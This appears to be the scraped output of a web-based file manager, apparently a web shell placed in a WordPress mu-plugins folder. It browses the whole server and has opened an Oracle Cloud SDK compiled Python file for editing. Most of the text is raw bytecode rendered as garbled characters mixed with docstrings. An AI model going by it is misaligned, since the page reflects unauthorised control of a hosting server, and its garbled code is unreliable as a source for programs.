📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
core
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/core/models/__pycache__
💾
Free:
45.9 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: instance_pool_instance.cpython-39.pyc
a ���f�@ � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdd� Zedd� �Z e j d d� �Z ed d� �Zej dd� �Zed d� �Zej dd� �Zedd� �Z e j dd� �Z edd� �Zej dd� �Zedd� �Zej dd� �Zedd� �Zej dd� �Zedd� �Zej dd� �Zedd � �Zej d!d � �Zed"d#� �Zej d$d#� �Zed%d&� �Zej d'd&� �Zed(d)� �Zej d*d)� �Zed+d,� �Zej d-d,� �Zd.d/� Zd0d1� Zd2d3� Zd4S )5�InstancePoolInstancezI Information about an instance that belongs to an instance pool. � ATTACHING�ACTIVE� DETACHINGc K s� dddddddddddddd� | _ ddddd d ddd ddddd� | _d| _d| _d| _d| _d| _d| _d| _d| _ d| _ d| _d| _d| _ d| _dS )a� Initializes a new InstancePoolInstance object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param id: The value to assign to the id property of this InstancePoolInstance. :type id: str :param instance_pool_id: The value to assign to the instance_pool_id property of this InstancePoolInstance. :type instance_pool_id: str :param availability_domain: The value to assign to the availability_domain property of this InstancePoolInstance. :type availability_domain: str :param lifecycle_state: The value to assign to the lifecycle_state property of this InstancePoolInstance. Allowed values for this property are: "ATTACHING", "ACTIVE", "DETACHING", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type lifecycle_state: str :param compartment_id: The value to assign to the compartment_id property of this InstancePoolInstance. :type compartment_id: str :param display_name: The value to assign to the display_name property of this InstancePoolInstance. :type display_name: str :param fault_domain: The value to assign to the fault_domain property of this InstancePoolInstance. :type fault_domain: str :param instance_configuration_id: The value to assign to the instance_configuration_id property of this InstancePoolInstance. :type instance_configuration_id: str :param region: The value to assign to the region property of this InstancePoolInstance. :type region: str :param shape: The value to assign to the shape property of this InstancePoolInstance. :type shape: str :param state: The value to assign to the state property of this InstancePoolInstance. :type state: str :param time_created: The value to assign to the time_created property of this InstancePoolInstance. :type time_created: datetime :param load_balancer_backends: The value to assign to the load_balancer_backends property of this InstancePoolInstance. :type load_balancer_backends: list[oci.core.models.InstancePoolInstanceLoadBalancerBackend] �strZdatetimez-list[InstancePoolInstanceLoadBalancerBackend]) �id�instance_pool_id�availability_domain�lifecycle_state�compartment_id�display_name�fault_domain�instance_configuration_id�region�shape�state�time_created�load_balancer_backendsr ZinstancePoolIdZavailabilityDomainZlifecycleStateZ compartmentIdZdisplayNameZfaultDomainZinstanceConfigurationIdr r r ZtimeCreatedZloadBalancerBackendsN)Z swagger_typesZ attribute_map�_id�_instance_pool_id�_availability_domain�_lifecycle_state�_compartment_id� _display_name� _fault_domain�_instance_configuration_id�_region�_shape�_state� _time_created�_load_balancer_backends)�self�kwargs� r'